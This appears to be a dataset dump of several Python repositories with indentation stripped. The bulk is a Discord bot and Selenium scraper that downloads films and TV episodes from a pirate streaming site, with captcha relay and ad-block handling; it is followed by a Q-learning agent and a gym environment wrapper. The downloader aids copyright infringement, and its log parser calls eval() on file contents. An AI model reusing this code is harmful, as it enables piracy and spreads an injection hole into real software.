# forced_resolution = message.content.split("--res=")[1]
# cfg.write_attempts(int(forced_resolution))
author = message.author
source_url = message.content
download_queue = scraper.get_download_link(source_url)
for data in download_queue:
target_url, metadata, *_ = data
run_download(target_url, metadata, author.id)
@tasks.loop(seconds=0.5)
async def check_logs(filename="log.txt"):
log_data = media.read_file(filename, filter=True)
if log_data:
media.write_file(filename, "### Beginning of message buffer from server ###\n")
bulk_message = []
for message in log_data:
if "--embed" in message:
metadata = eval(message.replace("--embed",""))
await create_embed(metadata)
elif "--channel=" in message:
message = message.split("--channel=")
await send(message[0], channel=message[1])
elif "--file" in message:
await send(message)
# elif "--res=" in message:
# forced_resolution = message.split("--res=")[1]
# cfg.write_attempts(int(forced_resolution))
# bulk_message.append(message.split("--res=")[0])
else:
bulk_message.append(message)
if bulk_message: await send("\n".join(bulk_message))
# |
# Discord Commands |
# V
@bot.command()
async def downloads(ctx, user: discord.User, *flags):
total_size = 0 # This is in MB
movies = []
user_id = user.id
lines = media.read_file(f"{user_id}.txt", filter=True)
for line in lines:
line = line.split("|")
movies.append(line[0])
total_size += float(line[2])
if "--list" in flags:
await send("{}".format("\n".join(movies)))
author = user.display_name
total_size = (
f"{int(round(total_size, 0))} MB" if total_size < 2048 else f"{round(total_size/1024, 2)} GB"
)
await send(
f"{author} has downloaded {len(movies)} movies/episodes totaling {total_size}."
)
@bot.command(aliases=["add", "download"])
async def download_first_result(ctx, *movie_name):
movie_name = " ".join(movie_name)
author = ctx.author.id
scraper.author = author
if "https://gomovies-online." in movie_name:
await send("Downloading via direct link...")
download_queue = scraper.get_download_link(movie_name) # This would be a link not a query
else:
await send("Searching for matches...")
try:
download_queue = scraper.download_first_from_search(movie_name) # Searches using a movie title
except NoResults:
download_queue = None
if download_queue:
for data in download_queue:
url, metadata, author = data
if url:
# If there were results and there is a valid URL, then download
await send("Link found, downloading starting...")
print(f"DEBUG: {metadata}")
await create_embed(metadata[list(metadata)[0]])
run_download(url, metadata[list(metadata)[0]], author)
else:
await send("**ERROR**: No search results found!")
else:
await send("No results!", silent=False)
@bot.command()
async def search(ctx, *search_query):
search_query = " ".join(search_query)
author = ctx.author.id
scraper.author = author
start_time = time.time()
if search_query:
results, metadata = scraper.search(
"https://gomovies-online.cam/search/" + \
"-".join(search_query.split())
)
print(f"Finished scraping search results in {round(time.time()-start_time,2)} seconds!")
if results and metadata:
for description in metadata:
# print(description)
await create_embed(metadata[description])
else:
await send("**ERROR**: No search results found!")
@bot.command()
async def react(ctx):
await ctx.message.add_reaction("\U0001F44D")
@bot.command(aliases=["status", "validate"])
async def validate_url(ctx, *url):
url = " ".join(url)
try:
status_code = download.validate_url(url)[0]
await send(f"Status for URL: {status_code}")
except MissingSchema as error:
await send(str(error))
@bot.command()
async def solve(ctx, captcha_solution):
await ctx.message.delete()
filename = "solved_captcha.txt"
media.write_file(filename, captcha_solution)
await ctx.send("Attempting captcha solve...")
# |
# Async Functions |
# V
async def create_embed(metadata, color=0xcbaf2f, channel="commands"):
embed = discord.Embed(
title=metadata["data-filmname"],
description=metadata["data-genre"],
color=color
)
embed.set_footer(text=metadata["data-descript"])
embed.set_thumbnail(url=metadata["img"])
embed.add_field(name="\U0001F4C5", value=metadata["data-year"], inline=True)
embed.add_field(name="IMDb", value=metadata["data-imdb"], inline=True)
embed.add_field(name="\U0001F554", value=metadata["data-duration"], inline=True)
await bot.get_channel(channel_id[channel]).send(embed=embed)
async def send(msg, channel="commands", silent=True):
channel = bot.get_channel(channel_id[channel])
if "--file" in msg:
msg = msg.split("--file=")
print(f"DEBUG: msg contains \"--file\" and the filename is \"{msg[1]}\"")
await channel.send(msg[0].strip())
await channel.send(file=discord.File(msg[1]))
else:
await channel.send(msg)
if not silent: print(msg)
async def set_status(activity, status=discord.Status.online):
await bot.change_presence(status=status, activity=discord.Game(activity))
# |
# Functions |
# V
def run_download(url, metadata, author):
download_function = download.Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
def run():
return bot.run(token)
if __name__ == "__main__":
run()
```
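`check_logs` polls `log.txt` as a one-way message queue from the download threads and routes each line by an inline flag; the flags below are the literal markers the parser looks for, while the example lines themselves are made up:
```python
# Line shapes the check_logs() parser understands, one message per line:
examples = [
    "Plain status text",                      # batched into one bulk message
    "Captcha! Solve it --file=captcha.png",   # text sent with a file attached
    "Lap finished --channel=log",             # routed to channel_id["log"]
    "{'data-filmname': 'X'} --embed",         # eval()'d into an embed dict
]
```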
#### File: PMD/code (OLD)/server OLD.py
```python
from __future__ import print_function
import socket
# unused ports: 26490-26999
port = 26490
address = socket.gethostbyname(socket.gethostname())
# IPv4 and TCP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Binding socket...")
s.bind((address, port))
print(f"Listnening for connections on \'{address}:{port}\"...")
s.listen(5)
def send(msg, encoding="utf8"):
if msg.replace(" ","") == "":
print("No text entered, nothing was sent.")
else:
clientsocket.send(msg.encode(encoding))
print(f"Sent URL:\n> {msg}")
clientsocket, address = s.accept()
print(f"Connection from {address} has been established!")
send("Welcome to the server!")
running = True
while running:
send(input("Enter a URL to send:\n> "))
```
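The old server has no client counterpart in this snapshot; a minimal sketch of one, assuming the same port and utf8 encoding (the loopback address is an assumption -- the server binds to its LAN IP):
```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 26490))  # match the server's address and port
while True:
    msg = s.recv(1024).decode("utf8")
    if not msg:
        break
    print(f"Received:\n> {msg}")
```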
#### File: 0xsmoos/PMD/config.py
```python
import socket
import os
#
# [NETWORKING]
#
local_server_address = socket.gethostbyname(socket.gethostname())
remote_server_address = "127.0.0.1"
server_port = 26490
network_buffer = 1024
max_connections = 5
max_retries = 2
proxy = False
# proxy = {
# "http": "socks5://192.168.50.98:9667",
# "https": "socks5://192.168.50.98:9667"
# }
#
# [DOWNLOAD OPTIONS]
#
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
# video_quality = [2160, 1440, 1080, 720, 480, 360]
video_quality = [2160, 1440, 1080, 720, 480, 360]
stream_chunk_size = 8*1024*1024
timeout = 60
executable = "chromedriver.exe" if os.name == "nt" else "chromedriver"
# [FUNCTIONS]
def reset_attempts():
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = "download_attempts = 0"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
def read_attempts():
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
return line[20:]
return False
def increment_attempts():
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = f"download_attempts = {int(line[20:])+1}"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
def write_attempts(count):
buffer = []
with open("config.py", "r") as file:
lines = file.read().split("\n")
for line in lines:
if line[:20] == "download_attempts = ":
line = f"download_attempts = {count}"
buffer.append(line)
with open("config.py", "w") as file:
file.write("\n".join(buffer))
```
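The `*_attempts` helpers persist a counter by rewriting `config.py` itself; they assume a `download_attempts = N` line exists in the file (not visible in this snapshot) and that the process's working directory contains `config.py`. A hypothetical session:
```python
import config as cfg

cfg.reset_attempts()        # rewrites the line to "download_attempts = 0"
cfg.increment_attempts()    # ... to "download_attempts = 1"
print(cfg.read_attempts())  # -> "1" (a string), or False if the line is absent
```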
#### File: 0xsmoos/PMD/download.py
```python
import os
from threading import Thread
import requests
from requests.exceptions import *
from urllib3.exceptions import SSLError
from scraper import Scraper
from stream import Stream
import config as cfg
import media
from media import log
headers = {"user-agent": cfg.user_agent}
resolution_list = cfg.video_quality
media_files = media.Media("MOVIES")
home = os.getcwd()
requests.adapters.HTTPAdapter(max_retries=cfg.max_retries)
def url_format(url, target_res, old_res="360"):
url = url.replace(f"/{old_res}?name=",f"/{target_res}?name=")
url = url.replace(f"_{old_res}&token=ip=",f"_{target_res}&token=ip=")
return url
def validate_url(url, target_res=None):
if target_res:
url = url_format(url, target_res)
error_message = ""
try:
request = requests.get(
url,
headers=headers,
proxies=(cfg.proxy if cfg.proxy else None),
stream=True,
timeout=(30,60)
)
status_code = request.status_code
except ConnectionError:
error_message = " (check the port on the proxy?)"
status_code = 403
request = None
print(f"STATUS for {target_res}p: {status_code}{error_message}" if target_res else None)
return status_code, request
class Download:
def __init__(self, url, metadata, author):
self.url = url
self.metadata = metadata
self.author = author
def best_quality(self, url):
if not url:
log("ERROR: No URL! Maybe there were no search results?", silent=False)
return False, None, None
if not isinstance(url, str):
url = url.get_attribute("src")
valid_resolutions = []
for target_res in resolution_list: # TODO: The proccess of checking every resolution's status code takes too long (fix me)
valid_resolution, request = validate_url(url, target_res)
valid_resolutions.append(valid_resolution)
if valid_resolutions[-1] == 200:
url = url_format(url, target_res)
break
if valid_resolutions[-1] == 403:
filmname = self.metadata["data-filmname"]
log(f"ERROR: Link expired while scraping \"{filmname}\".")
return False, None, None
if 200 not in valid_resolutions:
log(f"ERROR: Status code {valid_resolutions[-1]}.")
return False, None, None
return url, request, target_res
def run(self, resolution_override=None):
# Function should return True when the download is complete and False if it perminantly failed
self.url, request, resolution = self.best_quality(self.url)
if self.url is False:
return False
filmname = self.metadata["data-filmname"]
year = self.metadata["data-year"]
if "Season" in filmname and "Episode" in filmname:
print("Media is detected as TV Show.")
show_title = filmname.split(" - ")[0]
season = filmname.split(" - Season ")[1].split(" Episode")[0].split(" [")[0]
season = season if len(season) >= 2 else "0" + season
episode = filmname.split(" Episode ")[1].split(": ")[0]
try:
episode_title = filmname.split(": ")[(1 if " [" not in filmname else 2)]
# filename = f"{show_title} - s{season}ep{episode} - {episode_title}"
filename = f"{show_title} - s{season}ep{episode}"
except IndexError:
filename = f"{show_title} - s{season}ep{episode}"
absolute_path = os.path.abspath(
f"../TV SHOWS/{show_title}/Season {season}/{filename}.crdownload"
)
else:
print("Media is detected as Movie/Film.")
filename = (f"{filmname} ({year})" if filmname[-1] != ")" else filmname)
absolute_path = os.path.abspath(f"../MOVIES/{filename}/{filename}.crdownload")
stream = Stream(
request,
absolute_path,
(
resolution_override if resolution_override else resolution
),
)
stream.stream()
filename = filename.replace(".crdownload", ".mp4")
file_size = round(int(request.headers.get("content-length", 0))/1024/1024,2)
media.credit(self.author, filename=filename, resolution=resolution, file_size=file_size)
log(f"Finished download of {filename} in {resolution}p ({file_size} MB).", silent=False)
return True
if __name__ == "__main__":
def run_download(url, metadata, author):
download_function = Download(url, metadata, author)
threaded_download = Thread(target=download_function.run)
threaded_download.start()
scraper = Scraper(minimize=False)
search = input("Enter a Title to search for:\n> ")
while search:
download_queue = scraper.download_first_from_search(search)
if download_queue:
for data in download_queue:
if None in data:
log("No results!", silent=False)
run_download(data[0], data[1][list(data[1])[0]], data[2])
search = input("Enter a Title to search for:\n> ")
else:
log("No results!", silent=False)
```
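`url_format` upgrades the resolution token that appears twice in the stream URL; a quick illustration with a placeholder URL shaped the way the function expects:
```python
from download import url_format  # the helper defined above

url = "https://example.invalid/stream/360?name=movie_360&token=ip=1.2.3.4"
upgraded = url_format(url, 1080)
assert "/1080?name=movie_1080&token=ip=" in upgraded
```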
#### File: 0xsmoos/PMD/progress.py
```python
import time
import media
from media import log
def file_size(filename, count, start_time=None, target_size=None):
size = media.size(filename)
size_MB = round(size/1024/1024, 2)
if ((count+1) % 25 == 0 or count == 3) and start_time and target_size:
filename = media.format_title(filename)
remaining_size = target_size-size
speed = size/(time.time()-start_time)
speed_MB = round(speed*8/(1024*1024), 2)
ETA = time.strftime("%Hh %Mm %Ss", time.gmtime(remaining_size/speed))
size_MB, target_size = int(size_MB), int(target_size/1024/1024)
msg = f"Downloading {filename} at ~{speed_MB} Mbps, ETA: {ETA} ({size_MB}/{target_size} MB)."
log(msg, silent=False)
return size
if __name__ == "__main__":
start_time_debug = time.time()
time.sleep(1)
file_size("chromedriver", 3, start_time_debug-time.time(), 100000000)
```
#### File: 0xsmoos/PMD/scraper.py
```python
import time
import os
import sys
from selenium import webdriver
from selenium.common.exceptions import *
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import crop
import media
import config as cfg
from errors import NoResults
from media import log
class Scraper:
def __init__(self, minimize=True):
options = Options()
path = "Chrome Extensions"
files = os.listdir(path)
for file in files:
if file.endswith("crx"):
options.add_extension(os.path.abspath(path + "/" + file))
# options.add_argument("headless")
user_data_dir = os.path.abspath("selenium_data")
options.add_argument(f"user-data-dir={user_data_dir}")
options.add_argument("--disable-gpu")
options.add_argument("log-level=3")
self.driver = webdriver.Chrome(executable_path=os.path.abspath(cfg.executable), options=options)
self.first_launch = True
self.author = "0"
self.headers = {"user-agent": cfg.user_agent}
if minimize: self.driver.minimize_window()
def search(self, url, media_type=0):
if media_type == 0: # Movie (HD)
element_class = "item_hd"
description_class = "_smQamBQsETb"
elif media_type == 1: # Movie (CAM)
element_class = "item_cam"
description_class = "_smQamBQsETb"
elif media_type >= 2: # TV Show
element_class = "item_series"
description_class = "_skQummZWZxE"
self.open_link(url)
results, descriptions = self.get_results_from_search(
element_class=element_class,
decription_class=description_class
)
if not results:
if media_type >= 2: # TV Show
raise NoResults
media_type += 1
return self.search(url, media_type=media_type)
if media_type == 1: log("**INFO:** Film is in CAM quality.", silent=False)
if not descriptions: # this is the same as "if results and not descriptions:"
description_class = "_smQamBQsETb"
results, descriptions = self.get_results_from_search(
element_class=element_class,
decription_class=description_class
)
metadata = {}
for description in descriptions:
if description.get_attribute("data-filmname") != description.text: continue
metadata[description.text.replace(":","")] = {
"data-filmname": description.get_attribute("data-filmname").replace(":",""),
"data-year": description.get_attribute("data-year"),
"data-imdb": description.get_attribute("data-imdb").split(": ")[1],
"data-duration": description.get_attribute("data-duration"),
"data-country": description.get_attribute("data-country"),
"data-genre": description.get_attribute("data-genre"),
"data-descript": description.get_attribute("data-descript"),
"img": description.find_element_by_tag_name("img").get_attribute("src")
}
return results, metadata
def get_metadata_from_video(self, url):
filmname = self.driver.find_element(
By.XPATH, "//*[@id=\"info\"]/div[1]/div[1]/h1"
).text
metadata = {}
description = (
self.driver.find_elements(By.CLASS_NAME, "_skQummZWZxE") + \
self.driver.find_elements(By.CLASS_NAME, "_snsNGwwUUBn") + \
self.driver.find_elements(
By.XPATH, "/html/body/main/div/div/section/div[5]/div/box/div/div/div/div[3]"
)
)
metadata[filmname] = {
"data-filmname": filmname,
"data-year": description[0].text.split("\n")[1],
"data-imdb": description[1].text.split("\n")[1],
"data-duration": description[3].text.split("\n")[1],
"data-country": description[8].text.split(": ")[1],
"data-genre": description[6].text.split(": ")[1],
"data-descript": self.driver.find_element(
By.CLASS_NAME, "_snmrSkaJSTK").text.split("\n")[1],
"img": description[-1].get_attribute("src")
}
if not metadata[filmname]["img"]:
metadata[filmname]["img"] = \
"https://upload.wikimedia.org/wikipedia/commons/a/af/Question_mark.png"
return metadata
def wait_until_element(self, strategy, locator, timeout=10):
wait = WebDriverWait(self.driver, timeout)
element = wait.until(
EC.presence_of_element_located(
(
strategy, locator
)
)
)
return element
def open_link(self, url):
self.driver.get(url)
# The following code only runs when the adblock is still initializing from the first launch
if self.first_launch:
# Searches for any ads on the site
element = self.driver.find_elements(
By.XPATH,
"//*[@id=\"container-b530c7d909bb9eb21c76642999b355b4\"]/div[2]/div[5]/div/div[3]"
)
if element: # If any ads were found, refresh the page and run the ad check again
time.sleep(0.5)
self.driver.refresh()
self.open_link(url)
self.first_launch = False
def current_url(self):
return self.driver.current_url
def close(self):
self.driver.close()
def get_results_from_search(self, element_class="item_hd", decription_class="_smQamBQsETb"):
elements = self.driver.find_elements_by_class_name(element_class)
description = self.driver.find_elements_by_class_name(decription_class) # _skQummZWZxE
return elements, description
def screenshot_captcha(self, captcha_element, filename="captcha.png"):
self.driver.save_screenshot(filename)
# self.driver.save_screenshot("full_page.png")
location = captcha_element.location
location["y_off"] = 50
location["x_off"] = 120
return crop.crop(filename, location, cfg.executable)
def check_captcha(self):
# Myles
# Liam
try:
captcha_image = self.wait_until_element(
By.XPATH,
"//*[@id=\"checkcapchamodelyii-captcha-image\"]",
timeout=1.5
)
captcha_input = self.driver.find_element(By.XPATH, "//*[@id=\"checkcapchamodelyii-captcha\"]")
captcha_submit = self.driver.find_element(By.XPATH, "//*[@id=\"player-captcha\"]/div[3]/div/div")
except TimeoutException:
return None, None, None
if captcha_image:
print("DEBUG: Captcha!")
log("Captcha! Solve using the command:\n```beta solve <captcha_solution>```")
return captcha_image, captcha_input, captcha_submit
def run_captcha_functions(self):
captcha_image, captcha_input, captcha_submit = self.check_captcha()
if captcha_image:
time.sleep(0.25)
self.screenshot_captcha(captcha_image)
# log("DEBUG--file=captcha.png")
# solved_captcha = check_for_captcha_solve(timeout=1)
solved_captcha = False
if solved_captcha:
captcha_input.send_keys(solved_captcha)
captcha_submit.click()
def get_download_link(self, source_url, timeout=10):
movie = "watch-tv-show" not in source_url
# Link is a movie
if movie:
source_url = source_url.split(".html")[0] + (".html" if ".html" in source_url else "")
if not source_url.endswith("-online-for-free.html"):
source_url += "-online-for-free.html"
source_url_list = [source_url]
# Link is a TV show season
elif not source_url.endswith(".html"):
self.open_link(source_url)
source_url_list = self.driver.find_elements(By.XPATH, "//*[@class=\"_sXFMWEIryHd \"]")
for index, source_url in enumerate(source_url_list):
source_url_list[index] = source_url.get_attribute("href")
# Link is a TV show episode
else:
source_url = source_url.split(".html")[0] + ".html"
if not source_url.endswith("-online-for-free.html"):
source_url += "-online-for-free.html"
source_url_list = [source_url]
download_queue = []
for url in source_url_list:
if not url.endswith("-online-for-free.html"):
continue
self.open_link(url)
if self.run_captcha_functions(): self.get_download_link(url, timeout)
metadata = self.get_metadata_from_video(url) # Works for movies and TV
target_url = self.wait_until_element(
By.TAG_NAME, "video", timeout
).get_attribute("src")
self.driver.execute_script(
"videos = document.querySelectorAll(\"video\"); for(video of videos) {video.pause()}"
)
print(target_url)
download_queue.append((target_url,metadata,self.author))
# TODO: write all of the download links to a list so they can be downloaded in sequential order later (maybe return the list?)
return download_queue
# '''Demitri's Holy Contribution'''
# def get_movie(self, name):
# self.driver.get_link_by_partial_text("").click()
# self.driver.find_element_by_tag_name("input").text()
def download_first_from_search(self, search_query):
start_time = time.time()
search_results, metadata = self.search(
"https://gomovies-online.cam/search/" + \
"-".join(search_query.split())
)
if search_results:
search_time_elapsed = round(time.time()-start_time,2)
print(f"Finished scraping {len(search_results)} results in {search_time_elapsed} seconds!")
source_url = search_results[0].get_attribute("href")
download_queue = self.get_download_link(
source_url + ("-online-for-free.html" if "watch-tv-show" not in source_url else "")
) # [(x,y,z),(x,y,z),(x,y,z),...(x,y,z)]
print("Link found." if len(download_queue) == 1 else f"{len(download_queue)} links found.")
else:
download_queue = [] # avoid returning an unbound name when nothing matched
print("Error: No search results found!")
print(f"Finished all scraping in {round(time.time()-start_time,2)} seconds!")
return download_queue # [(url,metadata,author)]
def run(self, search_query):
download_queue = self.download_first_from_search(search_query)[0]
return download_queue
def check_for_captcha_solve(timeout=100):
if __name__ == "__main__":
media.write_file("captcha.txt", input("Solve the captcha:\n> "))
filename = "captcha.txt"
for half_second in range(timeout*2):
time.sleep(0.5)
if os.path.isfile(filename):
solved_captcha = media.read_file(filename)[0]
media.remove_file(filename)
return solved_captcha
log(f"Captcha was not solved withing {timeout} seconds.\nAborting download.", silent=False)
return False
def error(e):
''' Code by Confused Cottonmouth - Jan 13 2021 '''
exc_type, exc_obj, exc_tb = sys.exc_info()
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
return f"```javascript\nException type: {exc_type}\nFile name: {filename}\nLine Number: {exc_tb.tb_lineno}\nException data: {e}```"
if __name__ == "__main__":
scraper = Scraper(minimize=False)
while True:
query = input("Enter a Title to search for:\n> ")
if query:
scraper.run(query)
else:
break
scraper.close()
# The criminal I've been chasing is wearing my shoes.
```
#### File: 0xsmoos/PMD/stream.py
```python
import time
import os
import config as cfg
import progress
import media
from media import log
headers = {"user-agent": cfg.user_agent}
quality = cfg.video_quality
class Stream:
def __init__(self, request, filename, resolution, chunk_size=cfg.stream_chunk_size):
filename = filename.replace("\\", "/").replace("'", "")
filename = "".join(filename.split(".")[:-1]) + "." + filename.split(".")[-1]
filename = (
"/".join(filename.split("/")[:1]) + "/" + "/".join(filename.split("/")[1:]).replace(":", "")
) if "exe" in cfg.executable else filename
self.request = request
self.filename = filename
self.resolution = resolution
self.chunk_size = chunk_size
self.target_size = int(request.headers.get("content-length", 0))
def write(self):
self.verify_path()
with open(self.filename, "wb") as file:
title = self.filename.split(".")[0].split("/")[-1:][0]
size_MB = round(self.target_size/1024/1024,2)
start_time = time.time()
msg = f"Downloading {title} in {self.resolution}p ({size_MB} MB)..."
log(msg, silent=False)
try:
for count, chunk in enumerate(self.request.iter_content(chunk_size=self.chunk_size)):
file.write(chunk)
progress.file_size(
self.filename,
count,
start_time,
target_size=self.target_size
)
# except ConnectionResetError as e:
except Exception as e:
log(f"ERROR with {title}: Connection Reset!\nRetrying download...")
log(str(e))
self.write()
def verify_path(self):
path = "/".join(self.filename.split("/")[:-1])
path_exists = os.path.isdir(path)
if not path_exists:
os.makedirs(path)
return path_exists
def stream(self):
with self.request as r:
r.raise_for_status()
self.write()
print(media.rename(self.filename, self.filename.replace(".crdownload",".mp4")))
if __name__ == "__main__":
print(
Stream(
None, "MOVIES/Black Widow (2021)/Black Widow (2021).crdownload", 1080
).verify_path()
)
``` |
{
"source": "0xSMT/smt-env",
"score": 3
} |
#### File: smt-env/examples/qlearn-agent.py
```python
from smtenv import SMTEnv
from smtenv.envs.atesim import ATESim
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
class QLearnAgent(object):
def __init__(self, action_space, alpha = 0.6, gamma = 0.1, argmax=np.argmax, state_parse=None):
self.action_space = action_space
self.q = defaultdict(lambda: np.zeros(action_space.n))
self.alpha = alpha
self.gamma = gamma
self.na = self.action_space.n
self.last_action = None
self.state = None
self.state_parse = state_parse
self.argmax = argmax
def reset(self):
self.q = defaultdict(lambda: np.zeros(self.action_space.n))
def policy(self, state, epsilon = 0.00):
self.action_dist = np.ones(self.na, dtype=float) * (epsilon / self.na)
opt_a = self.argmax(self.q[state])
# print(self.q[state])
self.action_dist[opt_a] += (1.0 - epsilon)
return self.action_dist
def prop_policy(self, ob):
states = self.state_parse(ob)
positives = np.zeros(self.na)
tot = 0
# for state in states:
# dist = self.q[state].clip(0)
# positives += dist
# tot += np.sum(dist)
for state in states:
dist = self.q[state]
positives += dist
positives = positives.clip(0)
tot = np.sum(positives)
if tot != 0:
self.action_dist = positives / tot
else:
self.action_dist = np.ones(self.na, dtype=float) / self.na
return self.action_dist
def act(self, observation, reward, done):
return np.random.choice(np.arange(self.na), p=self.prop_policy(observation))
# next_action = self.policy(observation)
# if self.last_action != None:
# td = reward + self.gamma * self.q[observation][next_action] - self.q[self.state][self.last_action]
# self.q[self.state][self.last_action] += self.alpha * td
# self.state = observation
# self.last_action = next_action
# return self.last_action
def ate_state_parser(state):
states = []
for i in range(2, len(state), 2):
pair = state[i], state[i + 1]
states.append(pair)
return states
def train(agent, env, num_episodes = 100, episode_len = 100):
episode_results = dict()
episode_results["total_rwd"] = []
episode_results["length"] = []
for episode_i in range(num_episodes):
ob = env.reset()
reward = 0
total_rwd = 0
done = False
episode_log = {
"rwd": list()
}
steps = 0
print("Starting Episode {0}".format(episode_i))
for _ in range(episode_len):
action = agent.act(ob, reward, done)
next_ob, reward, done, _ = env.step(action)
episode_log["rwd"].append(reward)
total_rwd += reward
for last_state in agent.state_parse(ob):
for next_state in agent.state_parse(next_ob):
next_action = np.argmax(agent.q[next_state])
td = reward + agent.gamma * agent.q[next_state][next_action] - agent.q[last_state][action]
agent.q[last_state][action] += agent.alpha * td
if done:
break
steps += 1
ob = next_ob
episode_log["total_rwd"] = total_rwd
episode_results[episode_i] = episode_log
episode_results["total_rwd"].append(total_rwd)
episode_results["length"].append(steps)
return episode_results
# NOTE TODO: instead of treating the state as seeing three enemies at once, treat it as three separate states, seeing one enemy at a time, and
# sum the three action distributions generated by applying the policy to the three states, and renormalize. MUCH smaller state space
# to consider, and actually boosts the information gain as well.
if __name__ == '__main__':
scenario = {
"width": 4,
"height": 4,
"cellsize": 100,
"player": {
"x": 0,
"y": 0,
"vision": 2
},
"enemies": [
{
"id": "A",
"x": 2,
"y": 2,
"behavior": "chase",
"action_rate": 6
}
]
}
env = SMTEnv.register(
ATESim,
display_screen=False,
state_preprocessor=ATESim.state_flatten,
config=scenario,
fps=10
)
agent = QLearnAgent(env.action_space, state_parse=ate_state_parser)
results = train(agent, env, num_episodes=1000)
env.set_display(True)
SMTEnv.run(env, agent, episode_count=5, debug=True)
env.close()
# ep = np.linspace(0, len(results["total_rwd"]), num=len(results["total_rwd"]))
# plt.plot(ep, results["total_rwd"])
# plt.show()
```
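The `prop_policy` trick above sums per-enemy Q rows, clips away negative mass, and renormalizes into one action distribution -- the idea sketched in the NOTE TODO comment. A standalone check of that arithmetic:
```python
import numpy as np

# Hypothetical Q rows for a 4-action space, seen from two single-enemy states.
q_state_a = np.array([0.2, -0.5, 0.3, 0.0])
q_state_b = np.array([0.1,  0.4, -0.2, 0.0])

summed = (q_state_a + q_state_b).clip(0)  # [0.3, 0.0, 0.1, 0.0]
total = summed.sum()
dist = summed / total if total else np.ones(4) / 4
assert abs(dist.sum() - 1.0) < 1e-9       # a valid probability distribution
```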
#### File: smt-env/smtenv/smtenv.py
```python
import os
import gym
from gym import spaces
import numpy as np
import sys, os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
from smtenv.basegame import BaseGame
class _GameWrapper:
def __init__(self,
game, lock_fps=False, fps=30, display=True, state_preprocessor=None):
self.game = game
self.fps = fps
self.NOOP = None
self.display = display
self.lock_fps = lock_fps
self.last_action = []
self.action = []
self.previous_score = 0
self.frame_count = 0
self.noop = -1
if not isinstance(self.game, BaseGame):
class_name = self.game.__class__.__name__
raise Exception("{0} is BaseGame: {1}".format(class_name, isinstance(self.game, BaseGame)))
self.game.setup(display=self.display)
self.game.init()
self.state_preprocessor = state_preprocessor
def displayable(self):
return self.display
def set_display(self, display_flag):
self.display = display_flag
self.game._setup_display(display_flag)
def _tick(self):
if not self.display or self.lock_fps:
return 1000.0 / self.fps
else:
return self.game.tick(self.fps)
def get_actions(self):
actions = self.game.get_actions()
actions = list(actions)
actions.append(self.noop)
return actions
def get_frame_number(self):
return self.frame_count
def game_over(self):
return self.game.is_game_over()
def score(self):
return self.game.get_score()
def reset_game(self):
self.last_action = []
self.action = []
self.previous_score = 0.0
self.game.reset()
def get_screen_dims(self):
return self.game.get_screen_dims()
def get_game_state(self):
state = self.game.get_game_state()
if self.state_preprocessor is not None:
return self.state_preprocessor(state)
else:
return state
def act(self, action):
if self.game_over():
return 0.0
if action not in self.get_actions():
action = self.noop
previous_score = self.score()
self.game._do_action(action)
dt = self._tick()
self.game.step(dt)
self.game._draw()
self.frame_count += 1
rwd = self.score() - previous_score
return rwd
class SMTEnv(gym.Env):
@staticmethod
def register(game, display_screen=True, state_preprocessor=lambda x: x, fps=30, **args):
game_name = game.__name__ # register() receives the game class itself, so __class__ would name the metaclass
gym.envs.registration.register(
id=game_name.lower() + "-v0",
entry_point='smtenv:SMTEnv',
kwargs={'game_class': game, 'display_screen': display_screen, 'state_preprocessor': state_preprocessor, 'fps': fps, 'kwargs': args}
)
return gym.make(game_name.lower() + "-v0")
@staticmethod
def run(env, agent, episode_count=5, episode_length=100, debug=False):
reward = 0
done = False
for i in range(episode_count):
if debug:
print("Starting Episode {0}".format(i))
ob = env.reset()
for _ in range(episode_length):
action = agent.act(ob, reward, done)
ob, reward, done, _ = env.step(action)
if debug:
print(ob)
if done:
break
if debug:
print("Died? {0}".format(done))
env.close()
def __init__(self, game_class, display_screen=True, state_preprocessor=lambda x: x, fps=30, kwargs={}):
# import importlib
# game_module_name = game_name.lower()
# game_module = importlib.import_module(game_module_name)
# game = getattr(game_module, game_name)(**kwargs)
game = game_class(**kwargs)
self.game_state = _GameWrapper(game, fps=fps, display=display_screen, state_preprocessor=state_preprocessor)
self._action_set = self.game_state.get_actions()
self.action_space = spaces.Discrete(len(self._action_set))
self.screen_height, self.screen_width = self.game_state.get_screen_dims()
self.viewer = None
def set_display(self, display_flag):
self.game_state.set_display(display_flag)
def step(self, a):
reward = self.game_state.act(self._action_set[a])
state = self.game_state.get_game_state()
terminal = self.game_state.game_over()
return state, reward, terminal, {}
@property
def _n_actions(self):
return len(self._action_set)
def reset(self):
self.game_state.reset_game()
state = self.game_state.get_game_state()
return state
def render(self):
if self.game_state.displayable():
self.game_state.game._draw()
``` |
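`_GameWrapper` defines the game-side contract implicitly through the methods it calls; a skeletal subclass listing them in rough call order. Bodies are placeholders, and the underscore hooks the wrapper also uses (`_do_action`, `_draw`, `_setup_display`) are presumably supplied by `BaseGame` itself:
```python
from smtenv.basegame import BaseGame

class MinimalGame(BaseGame):
    def setup(self, display=True): ...    # create the window/surface
    def init(self): ...                   # one-time initialization
    def reset(self): ...                  # restart an episode
    def get_actions(self): return [0, 1]  # wrapper appends its own noop (-1)
    def get_screen_dims(self): return (64, 64)
    def get_game_state(self): return ()   # fed to the state_preprocessor
    def is_game_over(self): return False
    def get_score(self): return 0.0
    def tick(self, fps): return 1000.0 / fps  # ms elapsed this frame
    def step(self, dt): ...               # advance the simulation by dt ms
```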
{
"source": "0xSTAR/hagia",
"score": 3
} |
#### File: hagia/editor_utils/font.py
```python
import sys
